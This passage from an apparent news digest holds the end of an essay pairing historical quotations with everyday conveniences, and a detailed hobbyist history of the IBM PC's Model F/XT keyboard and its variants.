It’s nine. A chapter ends, and you stretch and wander into the kitchen. You’re not exactly sure what you want, so you aimlessly rifle through your fruit bowl, open and close the door to the fridge, and settle on a cup of tea. You lean against the counter and let your mind wander as the water comes to a boil.

Clean water on tap

Water! Water! is the universal note which is sounded through every part of the city, and infuses joy and exultation into the masses.

Philip Hone, 1842 — On the arrival of Croton water in New York City, in his diary. Manhattan’s wells shared soil with its privies and burial grounds; the cholera epidemic ten years earlier had killed 3,515 New Yorkers.

Fruit from afar

Like lovers' kisses, she biteth — she is a pleasure bordering on pain from the fierceness and insanity of her relish.

Charles Lamb, 1822 — On the rapture of the pineapple. In eighteenth-century Britain, a pineapple was costly enough that hostesses sometimes rented one for the evening rather than eat it.

Cold kept indoors

The first transport of ice from the shores of the United States to the banks of the Ganges is an event of no mean importance ... the names of those who planned and have successfully carried through their adventure at their own cost, deserve to be handed down to posterity with the name of other benefactors of mankind.

The Calcutta Courier, 1837 — On the arrival of New England pond-ice in tropical India. Without cold storage, perishable food like dairy and meat spoiled within a day, and most foods could not be kept or eaten out of season.

Eden in jars

It is said that these things come from the earthly paradise; for the wind blows down the trees in paradise, just as the wind blows down the dry wood in the forests of our own land.

Jean de Joinville, c. 1309 — On merchants who netted ginger, cinnamon and rhubarb from the Nile. In medieval price lists, a pound of ginger sold for the price of a sheep; a pound of saffron, the price of a horse.

The back room

At ten, the night starts to wind down. You wash your face, then wash down a pill with a glass of water. As you brush your teeth, you make a mental note of the last few chores you need to cross off the list tomorrow morning before heading to the airport.

Smallpox made historical

You have erased from the calendar of human afflictions one of its greatest. ... Future nations will know by history only that the loathsome smallpox has existed, and by you has been extirpated.

Thomas Jefferson, 1806 — In a letter celebrating Edward Jenner’s vaccine, sent to Jenner’s nephew. Smallpox killed about three of every ten people it infected, and in Jenner’s century it killed an estimated four hundred thousand Europeans a year.

Pain, interrupted

Before whom, in all time, surgery was agony; by whom pain in surgery was averted and annulled; since whom, science has controlled pain.

Epitaph of W. T. G. Morton, 1871 — Morton first publicly demonstrated ether anaesthesia. Before anesthesia, operations were performed with the patient conscious, and the primary means of managing pain were speed, alcohol, and opium.

The end of the outhouse

It just felt like I was the wealthiest person in the world. It felt great not to have to go outside to go to the restroom.

Patty Doak, 2003 — Recalling her family's first indoor bathroom, rural Iowa. Well into the twentieth century, most rural American homes had no indoor bathroom, and every gallon of water for cooking, washing, and bathing was carried in by hand.

Freedom on two wheels

I think it has done more to emancipate women than anything else in the world. I stand and rejoice every time I see a woman ride by on a wheel.

Susan B. Anthony, 1896 — Interviewed by Nellie Bly for the New York World. The safety bicycle opened up new possibilities for independent travel, especially for women under restrictive social rules.

The washtub retired

Come, Muse, and sing the dreaded Washing-Day. Ye who beneath the yoke of wedlock bend, With bowed soul, full well ye ken the day

Anna Laetitia Barbauld, 1797 — From her poem 'Washing-Day.' A household wash meant hauling and heating water by the barrel, then scrubbing, rinsing, and wringing every piece by hand; it filled an entire day each week.

The queen of inventions

What philanthropy failed to accomplish, what religion, poetry, eloquence, and reason had sought in vain, has been produced by — the Sewing Machine.

Godey's Lady's Book, 1860 — From 'The Queen of Inventions,' in the era's leading women's magazine. Before the machine, most people owned only two or three outfits, and a single new shirt meant some fourteen hours of hand stitching.

Warmth in every room

It is so cold that the freezing of the ink on the point of my pen renders it difficult to write. We have had the thermometer at 12°.

Thomas Jefferson, 1796 — In a letter to his son-in-law, the ink freezing as he wrote. Bedrooms in winter often fell close to the temperature outside, and it was not unusual to wake up to a frozen washbasin.

The old wish to fly

I sometimes think that the desire to fly after the fashion of birds is an ideal handed down to us by our ancestors who, in their grueling travels across trackless lands in prehistoric times, looked enviously on the birds soaring freely through space, at full speed, above all obstacles, on the infinite highway of the air.

Wilbur Wright, 1908 — Remarks at a banquet of the Aéro-Club de France, Paris. Before flight, crossing an ocean took a week or more at sea, and emigrating across one often meant never seeing your family again.

At eleven, you switch off the lights, silence your phone, and lie down to sleep. As your head hits the pillow, you idly wonder what people slept on before mattresses.

All the items in this room were once out of reach; some not yet invented, others too rare or costly for the vast majority of people. Today, most of us lucky enough to live with them walk past without a second thought.

It is to humanity’s credit that we remain restless in the midst of all of this progress. We continue to look forward, pushing the frontier further with new treatments, new tools, and new institutions that will help future generations in ways we can’t even picture yet.

But our lives today are a gallery of past generations’ heroic efforts to do the same. It serves us, and honors them, to recapture whenever possible the old sense of awe at these wonders that have long since become commonplace.

Sources

  • Recorded music Edward Bellamy, Looking Backward: 2000–1887 (Boston: Ticknor & Co., 1888), chapter 11.
  • Electric light A contemporary account of the lighting of Wabash, Indiana, March 31, 1880, reprinted in the county histories of 1884 and 1914.
  • Art reproductions André Malraux, Le Musée imaginaire, in La Psychologie de l’art (Geneva: Skira, 1947); translated by Stuart Gilbert in The Psychology of Art (New York: Pantheon, 1949); the quotation follows the Stuart Gilbert and Francis Price translation, Museum Without Walls (1967).
  • Photography Elizabeth Barrett Browning, letter to Mary Russell Mitford, December 7, 1843.
  • Corrected vision Giordano da Pisa, Lenten sermon at Santa Maria Novella, Florence, February 23, 1306; on the sermon, see Vincent Ilardi, Renaissance Vision from Spectacles to Telescopes (2007).
  • Instant communication Charles F. Briggs and Augustus Maverick, The Story of the Telegraph (New York: Rudd & Carleton, 1858).
  • Printed books Jakob Wimpfeling, Epitoma rerum Germanicarum (1505), translated in Theodore Low De Vinne, The Invention of Printing (1876).
  • Clean running water Philip Hone, diary entry, October 12, 1842, in The Diary of Philip Hone, 1828–1851 (1889), vol. 2.
  • Imported fruit Charles Lamb, “A Dissertation Upon Roast Pig,” London Magazine, September 1822; collected in Essays of Elia (1823).
  • Household refrigeration The Calcutta Courier, on the arrival of New England ice in Calcutta; quoted in Jonathan Rees, Refrigeration Nation (2013).
  • Global spices Jean de Joinville, The Life of Saint Louis (completed c. 1309), translated by Frank Marzials in Memoirs of the Crusades (1908).
  • Vaccination Thomas Jefferson, letter to George C. Jenner, Edward Jenner’s nephew, Monticello, May 14, 1806.
  • Anesthesia Inscription on the Morton monument, Mount Auburn Cemetery, erected 1871, attributed to Jacob Bigelow; printed in Historical Memoranda Relative to the Discovery of Etherization (Boston, 1871).
  • Indoor plumbing Patty Doak, interviewed in The People in the Pictures: Stories from the Wettach Farm Photos (Iowa PBS, 2003).
  • Personal mobility Nellie Bly, “Champion of Her Sex: Miss Susan B. Anthony,” New York World, February 2, 1896.
  • Automated laundry Anna Laetitia Barbauld, “Washing-Day,” The Monthly Magazine, December 1797.
  • Mechanized sewing “The Queen of Inventions — The Sewing Machine,” Editors’ Table, Godey’s Lady’s Book, July 1860, p. 77.
  • Central heating Thomas Jefferson, letter to Thomas Mann Randolph, November 28, 1796.
  • Human flight Wilbur Wright, remarks at a banquet of the Aéro-Club de France, Paris, November 5, 1908, in The Papers of Wilbur and Orville Wright, vol. 2 (1953).
The Daily Front Page 19 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Forty-Five Years of the PC
article

Happy 45th Birthday to the IBM PC and Model F/XT

by tart-lemonade·▲ 117 points·49 comments·sharktastica.co.uk ↗
the computing landscape changed forever

45 years ago today, on 12th August 1981, the computing landscape changed forever. IBM launched the Personal Computer (type 5150), which kickstarted a series of events that defined what most people today think a PC is, even if it was not the first computer to be called "personal". It was the vessel that kickstarted x86's popularity in computing at offices and homes alike. The PC's long-term staying power was not a feat IBM achieved alone - the IBM-compatible "clone" PC market is what helped sustain the ecosystem's prominence. Personally, I like to think a big part of the PC's initial success was its keyboard. Not the perfect layout as most may agree, but certainly a competent, well-built keyboard - the Model F/XT. Thus to celebrate, in the most appropriate way for Admiral Shark's Keyboards, we will look at this keyboard, where it came from, and what it became. Of course, with context as needed, including what led to the IBM PC, and both who and what was behind it.

In the run up

SCAMP prototype

5100 Portable Computer

5120 Computing System

Before the PC, IBM released products adjacent to a personal computer, and toyed with the idea of a personal computer throughout the 1970s. The PC's type number, 5150, places it in the lineage of the 5100 Portable Computer, and the 5110 and 5120 Computing Systems. 5100 in turn is an evolution of a prototype computer known as SCAMP (Special Computer APL Machine Portable), which was developed at the IBM Palo Alto Scientific Center in 1973.[4] William C. Lowe, an executive in the IBM General Systems Division (GSD) at the time, was considered instrumental in foresting this prototype. The 5100 was touted as a "personal computer" by some in the media, but it was a very expensive and not accessible to many people. It was notable for being portable though (for 1975), emphasised as IBM's smallest computing system to date.[5]

Aquarius concept

Atari 800

Tommy R. Hardy, a now-veteran IBM designer, conceptualised some interim ideas for a personal computer, including the "Yellow Bird" in 1976 and the "Aquarius" in 1977, both vaguely wedge-shaped in a form factor not unlike the later Commodore VIC-20, 64, etc., albeit bigger. Aquarius even made it to a pre-production prototype, but ultimately dismissed due to lack of confidence in its use of bubble memory modules. When Atari's 8-bit computers launched in 1979, IBM also considered aquiring Atari and utilising the 800 as a basis for the PC. Hardy conceputalised a pearl-white, IBM-branded 800 to this end,[6] but this idea proceeded no further. The next big thing, though, is Datamaster.

Datamaster

IBM 5322 System/23 Datamaster

5324 Datamaster

It would be impossible to have a discussion about the PC and its keyboard without talking about the IBM System/23 Datamaster, an influential experience for IBM that aided them in the PC's development and its keyboard. The 5322, the original "desktop" (all-in-one) Datamaster, was released in July 1981. It was followed by the 5324 "floortop" (tower) Datamaster, announced on 18th May 1982.[10] They were Intel 8085-based microcomputers intended to run business applications written in BASIC.

The development for Datamaster began in February 1978, and its hardware was ready by July 1980. However, as recalled by IBM engineer David J. Bradley, who worked on Datamaster, its launch was delayed by a year and to just a month before PC thanks to IBM deciding to develop the Datamaster's BASIC more in line with the IBM System/34 midrange computer's implementation of it.[11] The 5322's styling is attributed to Hardy via its U.S. design patent (275,285), which was filed on 4th February 1980. The design at that stage was largely like the finished product, though the keyboard layout is slightly different, with extra keys and a non-stepped Enter key. If design patents for 5324 exist, I was not able to find them during my research.

5322 keyboard (top)

5322 CSA (top)

5322 CSA (bottom)

The Datamaster keyboard establishes the basis for every other keyboard discussed today. It is presently the earliest confirmed Model F keyboard implementation to make it to market, which would soon expand into an entire family of IBM flagship keyboards prominent for the first half of the '80s. They all use capacitive buckling springs, a keyswitch design by Richard Hunter Haris (U.S. utility patent 4,118,611), where pressing a key compresses a metal coil spring underneath in a way that it eventually "catastrophically" buckles, which in turn pivots a small plate made of a capacitive material atop a capacitance-sensing PCB called a "pad card". The keyboard assembly this all sits in is largely metallic, with a steel frame holding the keyswitch barrels at the top, and a usually-chromated steel base plate at the bottom.

The 5322 keyboard is a complete sub-assembly (CSA) that sits inside the host Datamaster. The keys are arranged in a layout derived from the Model B-based IBM 5251/5252 Display Station Typewriter Keyboard, which was IBM's most immediate and common pre-Datamaster major keyboard design. The aforementioned pad card bears a 12x8 key matrix and an Intel 8048 as its controller. The keyboard uses a parallel-style interface where an inverted 7-bit scancode is sent across separate scanbit lines together. Like its layout, its scancodes are also derived from the 5250 family. On the receiving end, according to RetroAND (bitspassats.com), the Datamaster has an 8255 Programmable Peripheral Interface configured for mode 1 input. As the keyboard is completely internalised, it connects directly to the 5322 motherboard (CPU planar board) via an 8x2 header.

5324 keyboard (top)

5324 keyboard (bottom)

5324 CSA (top)

5324 daughterboard (top)

5324 daughterboard (bottom)

As the 5324 is a distributed system, its version of the keyboard is discrete, connecting to its host via a DB-25-terminating cable. Chronologically, this was released after the PC, so it derives its styling from the PC's keyboard, but with a considerably enlarged cover set and slightly longer riser feet. It may sometimes be confused with the IBM 5291/5292 keyboard also discussed later, but the 5324 keyboard has the larger bezel between them, to the point it sometimes gets nicknamed the "bezelmaster" Model F keyboard. The 5324 keyboard reuses the 5322's keyboard CSAs. But the 5324 keyboard adds a "keyboard adapter card" before its external cable. As explained to me by RetroAND, it has positive buffers and double negations for the control signals, likely to reduce noise. In effect, it prepares a design that was originally integrated into something, to be a distributed design that requires a longer cable.

Personal Computer

An IBM Personal Computer (base unit)

Roll back the clock to July 1980: Lowe pitched the idea of a small, low-cost business and consumer computer to IBM CEO Frank Cary, who subsequently gave him a month to develop a prototype and to launch the finished product in a year. It was dubbed "Project Chess". Lowe was promoted soon after, so Chess fell to Philip Donald (Don) Estridge. Both have been referred to as the "Father of the IBM PC".[17][18] The team consisted of about twelve engineers, who were famously able to develop the PC outside of IBM's typical processes, ultimately allowing them to meet the one-year deadline, rather than complete it in 2 to 5 years like most other IBM systems of the time.

The earliest sketches of what became the PC, from 10th August 1980, were only relatively recently published. They show that a lot of what became the PC was nailed early on, including its use of the Intel 8088, five expansion slots, two floppy diskette drives, use of ASCII instead of EBCDIC, and a detached Model F-based keyboard. There are some notable differences, of course, including the display controller, the power supply unit's location inside the PC, and that it originally specified 8" floppy diskette drives instead of 5¼".[19]

To achieve their goal, the team was also assisted by prior experience with developing Datamaster, and using readily available components. The PC's use of an Intel CPU, various Intel supporting controllers and timer, and 8-bit ISA bus were derived from Datamaster's use of similar technologies. The choice of an 8088 with 20-bit/1MB address space was largely informed by woes with Datamaster's 8085 and its 16-bit/64KB address space. The choice of 8088 over 8086 was down to savings that could be had by needing to support just an 8-bit data bus instead of 16.[11]

An IBM Personal Computer

As you know, the IBM 5150 Personal Computer was released 45 years ago today. Its importance cannot be overstated. Its open architecture and use of the 8086-sibling Intel 8088 established one of the most popular and long-lived computer ecosystems. For better or worse nowadays, the combination of it and a Microsoft-sourced operating system is still relevant thanks to this. To me personally, learning about it and tinkering with its descendants are the backdrop to my technical interests and knowledge. The PC was joined by the IBM 5160 Personal Computer XT (PC/XT) on 8th March 1983. Over the original PC, the PC/XT adds a built-in hard drive and 3 expansion slots,[20] otherwise being a very similar design. Whilst there are many factors as to why the PC succeeded, it was certainly aided by the inclusion of a competent keyboard.

The IBM Personal Computer Keyboard

Type 1 vs 2 F/XT (top)

Type 1 vs 2 F/XT (CSA bottom)

The IBM Personal Computer Keyboard is often colloquially referred to as the "XT keyboard" or "Model F/XT", using its association with the PC/XT to differentiate it from the later IBM Personal Computer AT Keyboard ("Model F/AT"). Components of the F/XT can also be referred to as being "XT". At its core, the F/XT has a keyboard assembly much like the Datamaster's, but it adopted a new serial-based protocol retroactively called IBM PC Mode 1 (also known as the "XT keyboard interface", naturally). It emits 9-bit data packets facilitating IBM scancode set 1. The keycap nomenclature was changed to ASCII style instead of EBCDIC. In the aforementioned sketches, the interface and nomenclature were decided from the beginning, but it was also supposed they may cost-save the design by eliminating the leftmost function key bank,[19] which did not come to fruition.

I was not able to find any design patents for the PC itself (if they existed), but the keyboard's (U.S. design patent 278,063) is known. Tommy Hardy is also cited for this work, as is Edward Chamberlain, Nicholas M. Leon, Peter J. Mendel (who would later work on many other keyboard-related IBM product designs), and Michael H. Sharp. Two major variants of the original F/XT are known, both with their own nuances and differences or similarities to the Datamaster keyboards. They are referred to as Type 1 and Type 2.

Type 1 F/XT (top)

Type 1 F/XT CSA (bottom)

Type 1 F/XT CSA (open)

Type 1 F/XT pad card

Type 1 F/XT controller daughtercard

Type 1 F/XT possible data stamp

The original design, Type 1, is very rare today. I have only seen examples with "81" date codes on either its chips or stamped somewhere inside the cover set, so I imagine it was phased out quickly in favour of Type 2. What is interesting is that IBM chose a different approach to Datamaster for its electronics. It has a 24x4 key matrix, and the controller is split into a capacitance-sensing driver and demultiplexer on the pad card, and a separate daughterboard with an Intel 8048 as its controller. The reason for this design may be explained by the IBM 5291/5292's existence.

A telltale sign from the outside is that its original cable's 180° 5-pin DIN plug has no black plastic jacket like Type 2. The keyboard also has a reset line, which the IBM PC Technical Reference implies was not used[24] and is entirely dropped by Type 2.

Another IBM Personal Computer

Type 2 F/XT (top)

Type 2 F/XT (bottom)

Type 2 F/XT (side)

Type 2 F/XT CSA (top)

Type 2 F/XT CSA (bottom)

Type 2 F/XT pad card

The Type 2 design is what most F/XTs actually are, and certainly by the time of PC/XT, the only one available. As already mentioned, their DIN plugs have a plastic jacket and lack a reset line. But much has changed internally too, perhaps anarchonistic in some ways. It reverts to using a 12x8 matrix like Datamaster's, though configured differently. The controller is unified with the pad card once again, though of course still implementing the IBM PC Mode 1 interface.

5291 & 5292

5291 Model 1 (illustration of)

5291 Model 2

5292

The IBM 5291 Model 1 Display Station and 5292 Color Display Station were both 5250-family terminals announced on 6th September 1982. They are plug-compatible with the '70s IBM 5251 Display Station (model 11),[29][30] though the 5291 was intended as a low-cost replacement and the 5292 as a colour-enhanced supplement. 5291 Model 2 joined them on 2nd October 1984,[31] which was functionally identical to 5291-1 but smaller, more ergonomic, and with a relocatable screen, whereas 5291's was tightly integrated into the base unit.

529X (top)

529X (bottom)

529X (side)

529X CSA (bottom)

529X capsense driver

529X feet (all extended)

529X feet (various levels)

The 529X keyboard is a fun one. It's like the F/XT but dialled up to eleven. It has considerable bezels just like the 5324's, though with a slightly smaller 'forehead'. But it also has absurd three-setting riser feet, the longest of an IBM keyboard I have seen. Perhaps both of these facts lend themselves to the 529X keyboard's common nickname - the "bigfoot" Model F. The key nomenclature is back to being 5250-style, given 5291's and 5292's application. The 529X keyboard CSA is the same as the Type 1 F/XT's but without the controller daughtercard. Instead, the terminal itself would be its controller, making the 529X keyboard effectively "brainless" on their own. This is where I can see why IBM designed the Type 1 F/XT differently from Datamaster - more component commonality between higher-volume products. Both PC and (in my observations) at least 5291 were more so than Datamaster. Ultimately, the simpler, more elegant Type 2 solution won out for PCs, though.

The 5291-2 and 5292 shared the same completely detachable keyboard with a DA-15 plug, dubbed the Type 2 529X keyboard. 5291-1's Type 1 was instead always tethered, as its cable connected to a 14-pin IDC-style header inside the terminal, meaning the terminal has to be opened to detach it. The Type 2 is typically the far more common of the two today.

IBM-era rear label

Lexmark-produced rear label

Lexmark-refurbed rear label

Of all the keyboards discussed today, the 529X keyboard was produced the longest. Lexmark, which was founded from IBM Information Products Corporation's divestiture on 27th March 1991,[34] produced 529X keyboards into at least mid-1994. This also makes it one of the last Model Fs in production in general. Lexmark also refurbished existing 529X keyboards into 1996, their final year in the keyboard business. Lexmark-produced and Lexmark-refurbished 529X keyboards can usually be distinguished by the latter being mislabelled "Model M" on their rear labels instead of "F".

System 9000

IBM 9001 (formerly CS/9000)

IBM 9002

The IBM Instruments Computer System 9000 (CS/9000, also known simply as the System 9000) was a Motorola 68000-powered laboratory computer introduced in May 1982. It was notable for its vertical stack including an integrated printer/plotter and a 57-key membrane touch panel. On 21st February 1984, IBM introduced the System 9002 Desk-Top Computer and renamed the CS/9000 to the System 9001 Bench-Top Computer. In Q2 1985, the System 9003 Industrial-Floor Computer also joined them.[36]

The 9002 was designed to be a space-saving alternative to the now-9001, shedding the printer/plotter and integrating the membrane touch panel into the keyboard itself.[37] The 9003 was intended for use in manufacturing and process control applications, being able to operate as standalone or link with an IBM host processor via Systems Network Architecture (SNA). The entire 9000 family was withdrawn effective 2nd December 1986,[38] as ultimately all three members were unsuccessful in their respective markets.

9001 Standard Keyboard (top)

9001 Standard Keyboard (bottom)

The CS/9000 and 9001 used the IBM System 9000 Standard Keyboard, which was designed to sit on top of a protrusion from the host computer. The Standard Keyboard notably sports a rectangular "IBM System 9000" branding, no flip-out riser feet, a cable that sprouts from the left, and a choke just before the cable's DIN plug. Otherwise, it is the same and electrically compatible with the standard F/XT.

9002 Hybrid Keyboard

The 9002's keyboard - the IBM System 9002 Hybrid Keyboard - is a lot more interesting, though. As aforementioned, this keyboard notably integrates the 57-key membrane touch panel into the keyboard itself. Presumably, "Hybrid" refers to its nature of having both a buckling-spring keyboard and the touch panel. The resultant design is very reminiscent of the IBM 104-key Model F Converged Keyboard used for the IBM 3290 Information Panel and 5085 Graphics Processor, with the panel taking the place of the 24-function-key bank but retaining its noticable bezels and two-stage riser feet. Despite this, the keyboard itself remains the F/XT-style assembly.

Whilst a 9002 computer has turned up in recent times, the keyboard has not, nor are there any photos of the keyboard from outside the 1980s. No one that I know owns one to test it or dig inside, thus its electronics remain a mystery to me. In my 'professional' opinion, the 9002 Hybrid Keyboard is the rarest Model F keyboard known, perhaps at most tied with another keyboard I plan to talk about soon. At least all the other known variants have been contemporaneously pictured...

At present, the 9003 or its keyboard also remain unseen to me. Computerworld's reporting suggests the keyboard and 57-key touch panel were separate, just like the 9001.[41]

Portable Personal Computer

The IBM Portable Personal Computer

On 16th February 1984, IBM announced the 5155 Portable Personal Computer. It is essentially a PC/XT assembled into a luggable form and given a cute 9" amber CRT display and one or two now-half-height 5¼" floppy diskette drives.[43] It was IBM's answer to the Compaq Portable, one of the first IBM PC clones that launched just under a year earlier and happened to be in the same form factor.

Portable PC Keyboard (top)

Portable PC Keyboard CSA (bottom)

Compared to the original F/XT, the 5155's version is housed in an all-plastic, two-tone cover set with a compartment to stuff its cable into, its base plate is a shiny, silvery aluminium instead of chromated steel, and it has a 6-pin modular plug instead of DIN. This results in the keyboard being considerably lighter and sounding somewhat higher-pitched than the original. The cover set can also be opened toolessly as the dark plastic bezel surrounding the keys can be lifted at any time. Electrically, the keyboard remains unchanged, and it can be passively adapted to 5-pin DIN if so desired.

When not in use, the keyboard should be mounted upright to the front of the 5155, covering its entire front. The keyboard has two clips towards the top that are used to release it and allow it to pivot down. You can additionally deploy its riser feet to completely detach the keyboard from the host PC.

TPC and EMR

The IBM Tempest PC (TPC) family are IBM PC-related products that were designed or modified to qualify under the TEMPEST program. TEMPEST is a NATO-recognised, United States National Security Agency specification regarding protecting against spying with electronic equipment. In particular, qualifying systems are designed not to radiate electromagnetic emanations to counter Van Eck phreaking. IBM referred to such systems as being 'TEMPESTed', usually adding special covers and filters to meet the requirements. The TPC family ultimately included the IBM 4450 TPC1 (TEMPESTed PC), 4455 TPC2 (PC/XT), 4456 TPC3 (3270 PC), 4459 TPC4 (PC/AT), and 4460 TPC5 (3270 PC/AT).[44]

TPC1 (top)

TPC2 (top)

TPC2 (branding)

EMR1 (top)

EMR2 (branding)

TPC1 and TPC2 indeed come with an F/XT variant named TPC Keyboard I and TPC Keyboard II, respectively, which despite their name and part numbers, do not differ from each other. Additionally, an IBM EMR Keyboard and EMR Keyboard II are known, although it is presently unclear to me what exactly those two were used for (ie., are they also TPC family products or are they intended for TEMPESTed IBM systems outside of the TPC family).

TPC1 CSA (bottom)

TPC2 CSA (bottom)

TPC2 DE9 plug

EMR1 cable

EMR1 DIN plug

All four keyboards have clay covering the controller, hardier, non-coiled cables, and unique plugs compared to their 'civilian' counterparts. EMR I uniquely used a 180° 5-pin DIN plug not unlike the Type 1 F/XT's, whereas the other three (and TPCs 3 through 5) used a DE-9 connector instead. This means EMR I is not physically compatible with the known TPCs. EMR II, however, seems to be identical to TPC1 and TPC2.

Regarding the PCs themselves, at least based on Cathode Ray Dude's analysis on the TPC4 and comparison with a standard PC/AT, they appear to be mostly as you would expect from the standard models inside. The motherboard, power supply and ISA card complement were typical, and the differences lay with the reinforced outer casing, the power switch location and function, and some buffer space between the rear I/O and the actual back of the TPC.[51]

What about 5531?

5531 keyboard (top)

5531 keyboard Oak FTM keyswitches

5531 keyboard rear label

It is worth briefly mentioning the IBM 5531 Industrial Computer and its keyboard. The IBM 5531 Industrial Computer was an industrialised version of the PC/XT, introduced on 1st May 1984. It was intended for use on factory floors and accordingly designed to be more resistant to harsher physical conditions.[55] Being PC/XT-based, it thus received an XT-style keyboard. Whilst it superficially looks like an industrial-grey version of the F/XT, the keyboard is of an unrelated design and not considered a Model F keyboard. It was made by Oak Switch Systems for IBM, using their Full-Travel Membrane (FTM) keyswitches. To easily tell it a part from the F/XT, note its flatter appearance and the lack of curvature on the separator between the F-keys and the rest of the keys. This is not to say this keyboard does not have any merit; just note that it is indeed not a Model F and you should not expect it to be like one.

Acknowledgements

  • Big thanks to RetroAND (https://bitspassats.com/) for our mutual conversations over the last year or so on Datamaster, and their assistance with ensuring the facts surrounding Datamaster inside this article and elsewhere are as best as they could be.

Further reading & resources

Internal

External

Sources

ASK. Admiral Shark's Keyboards original content. License/note: CC BY-NC-SA 4.0.

  1. Matt Kieffer @ Wikimedia - File:IBM SCAMP at Smithsonian National Museum of American History.jpg [accessed 2026-08-12]. License/note: CC BY-SA 2.0 (cropped).
  2. Norsk Teknisk Museum - NTM TELE IBM 2012 51001 [accessed 2025-04-15]. License/note: CC BY-SA 4.0 (cropped).
  3. Tekniska museet - TEKS0041857 [accessed 2025-04-15]. License/note: CC BY-SA 4.0 (cropped).
  4. Smithsonian Institution - IBM SCAMP Microcomputer [accessed 2026-08-12].
  5. Wikipedia - IBM 5100 [accessed 2026-08-12].
  6. Laptop Retrospective - Think Design Stories: IBM and Design, The Road to the Personal Computer (ft. Tom Hardy) [accessed 2026-08-11]. License/note: screencap taken and used under fair dealing.
  7. snuci - File:IBM 5322 - computer.JPG [accessed 2024-12-25]. License/note: public domain.
  8. bitsavers - Index of /pdf/ibm/system23/5324 [accessed 2026-08-12]. License/note: believed to be public domain.
  9. IBM - IBM Hardware List as of 12/15/87 [accessed 2026-08-12].
  10. Ardent Tool - David J. Bradley - The Creation of the IBM PC [accessed 2026-08-11]. License/note: originally from Byte Magazine, September 1990.
  11. snuci - File:IBM 5322 - barrel plate front.JPG [accessed 2024-03-18]. License/note: public domain.
  12. snuci - File:IBM 5322 - back plate with PCB.JPG [accessed 2024-03-18]. License/note: public domain.
  13. C. Hurlbut - 1982 F [accessed 2024-03-04]. License/note: copyright @ Christopher Hurlbut (explicit permission to use here given).
  14. C. Hurlbut - 1982 F [accessed 2024-11-22]. License/note: copyright @ Christopher Hurlbut (explicit permission to use here given).
  15. IBM - The Guide to personal computer offerings from IBM Fall 1983 Winter 1984 (#6936938-1) [accessed 2026-08-12]. License/note: photos used under fair dealing.
  16. The Digital Antiquarian - The IBM PC, Part 1 [accessed 2026-08-11].
  17. IBM - The IBM PC [accessed 2026-08-11]. License/note: retrieved via Wayback Machine (2024-05-30 capture).
  18. OS/2 Museum - The IBM PC, 41 Years Ago [accessed 2026-08-11].
  19. IBM - USA announcement letter 183-027 [accessed 2026-08-12].
  20. IBM - The Guide to personal computer offerings from IBM Fall 1983 Winter 1984 (#6936938-1) [accessed 2025-05-03]. License/note: photos used under fair dealing.
  21. vintagecomputer.ca - IBM PC Model F keyboards [accessed 2026-08-12]. License/note: permission to use given via email.
  22. vintagecomputer.ca - IBM PC Model F keyboards [accessed 2026-08-13]. License/note: permission to use given via email.
  23. IBM - IBM Personal Computer Technical Reference (#6025008) [accessed 2026-08-12].
  24. Wodan - File:IBM Model F XT PCB.png [accessed 2026-08-13]. License/note: CC BY-SA 4.0 (cropped, rotated & contrast adjusted).
  25. IBM - IBM 5291 Display Station Maintenance Library (#SY31-0661-0) [accessed 2024-12-22]. License/note: document archived by bitsavers, illustrations used under fair dealing.
  26. bitsavers - Index of /pdf/ibm/5291/5291-2_pictures [accessed 2024-12-22]. License/note: believed to be public domain.
  27. IBM - IBM System/36 Equipment and programs (#G580-0451-02) [accessed 2024-12-22]. License/note: document archived by bitsavers, photos used under fair dealing.
  28. IBM - EMEA announcement letter ZG82-0274 [accessed 2026-08-12].
  29. IBM - EMEA announcement letter ZG82-0275 [accessed 2026-08-12].
  30. IBM - USA announcement letter 184-118 [accessed 2026-08-12].
  31. Brandon @ clickykeyboards.com - 1996 IBM Model F keyboard (1397950) 3/19/96 (83-key) [accessed 2026-08-12]. License/note: https://deskthority.net/wiki/Help:Contents#Copyright.
  32. webwit - Index of /input/ibm_misc [accessed 2024-02-05]. License/note: public domain.
  33. US Customs and Border Protection - CROSS Ruling 544887 [accessed 2025-12-18].
  34. SneakyRobb @ Deskthority - IBM System 9000 keyboard and picture of unknown Model F#p455136 [accessed 2025-04-04]. License/note: used under fair dealing.
  35. Wikipedia - IBM System 9000 [accessed 2026-08-12].
  36. IBM - USA announcement letter 184-022 [accessed 2026-08-12].
  37. IBM - USA announcement letter 186-165 [accessed 2026-08-12].
  38. Engicoder - File:CS-9000-Front.JPG [accessed 2023-04-22]. License/note: public domain.
  39. Engicoder - File:Cs-9000-rear.JPG [accessed 2024-03-18]. License/note: public domain.
  40. Computerworld - April 29, 1985 [accessed 2026-08-12].
  41. Norsk Teknisk Museum - NTM TELE IBM 2012 55002 [accessed 2025-04-15]. License/note: CC BY-SA 4.0 (cropped).
  42. IBM - USA announcement letter 184-028 [accessed 2026-08-12].
  43. IBM - IBM Personal Computer Family Service Information Manual (#SA38-0037-00) [accessed 2026-08-11]. License/note: document archived by bitsavers, diagrams used under fair dealing.
  44. WorthPoint - Extremely Rare Vintage IBM TPC Keyboard I - Clicky - Similar to PC XT Model F [accessed 2023-04-22]. License/note: used under fair dealing.
  45. WorthPoint - Vintage IBM Model F TPC Keyboard II 1385361, For Tempest Computer, "5" Key Stuck [accessed 2026-08-12]. License/note: saved from volatile eBay listing via WorthPoint & used under fair dealing.
  46. Compgeke - File:EMR1.jpg [accessed 2026-08-12]. License/note: public domain.
  47. Brandon @ clickykeyboards.com - 1987 IBM EMR keyboard 100A535 83-key NEW [accessed 2026-08-12]. License/note: https://deskthority.net/wiki/Help:Contents#Copyright.
  48. JP! @ deskthority - IBM Model F XT TPC I EMR Keyboard [accessed 2026-08-12]. License/note: used under fair dealing.
  49. WorthPoint - Vintage IBM Model EMR Keyboard 83 key industrial or pc [accessed 2026-08-12]. License/note: saved from volatile eBay listing via WorthPoint & used under fair dealing.
  50. Cathode Ray Dude - CRD - A TEMPEST In AT-Cup: The IBM TPC [accessed 2026-08-11].
  51. snuci - File:IBM Industrial XT (Oak) keyboard top.jpg [accessed 2024-04-15]. License/note: public domain.
  52. snuci - File:IBM Industrial XT (Oak) identification.jpg [accessed 2024-04-15]. License/note: public domain.
  53. snuci - File:IBM Industrial XT (Oak) internal label.jpg [accessed 2024-04-15]. License/note: public domain.
  54. IBM - USA announcement letter 184-065 [accessed 2026-08-13].
The Daily Front Page 20 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Before the Desktop
article

Come for ENIAC, Stay for UNIVAC and Skeduflo

